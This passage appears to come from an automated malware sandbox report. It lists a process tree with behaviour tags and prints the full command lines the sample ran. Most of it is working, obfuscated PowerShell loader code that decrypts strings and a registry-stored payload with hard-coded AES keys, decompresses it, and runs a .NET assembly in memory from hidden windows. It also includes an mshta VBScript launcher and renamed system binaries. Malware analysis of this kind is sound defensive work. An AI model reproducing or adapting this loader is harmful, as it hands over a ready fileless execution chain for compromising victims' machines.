[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = 
[Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))4⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Hide Artifacts: Hidden Window
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
- C:\Windows\SysWOW64\dllhost.exe (tree depth 5)
  cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{3e25bd7b-f7ba-4452-96bd-65a74d0e4b4e}
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4976).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = 
$qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = 
[Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))5⤵
  - Executes dropped EXE
  - Hide Artifacts: Hidden Window
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\dllhost.exe (tree depth 5)
  cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{769ae426-e739-4682-89d1-b39388590f22}
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\dllhost.exe (tree depth 5)
  cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{fcf5b0f2-260d-440c-bc0c-8cf94d5e9152}
- C:\Windows\SysWOW64\dllhost.exe (tree depth 5)
  cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{890b9a93-eaaa-4a90-ba4d-03b09e9dc71e}
- C:\Windows\SysWOW64\dllhost.exe (tree depth 5)
  cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{ec89e5f2-e9ae-4cac-9b30-d226b04a1d55}
- C:\Windows\SysWOW64\dllhost.exe (tree depth 5)
  cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{8a92fddd-246d-4ab0-bb2d-cb03931777f0}
- C:\Windows\SysWOW64\WerFault.exe (tree depth 6)
  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 468
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
- C:\Windows\SysWOW64\dllhost.exe (tree depth 5)
  cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{5864ce94-f02e-4fec-97a5-4ee963750108}
- C:\Windows\$sxr-mshta.exe (tree depth 2)
  cmdline: C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
- C:\Windows\$sxr-cmd.exe (tree depth 3)
  cmdline: "C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = 
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = 
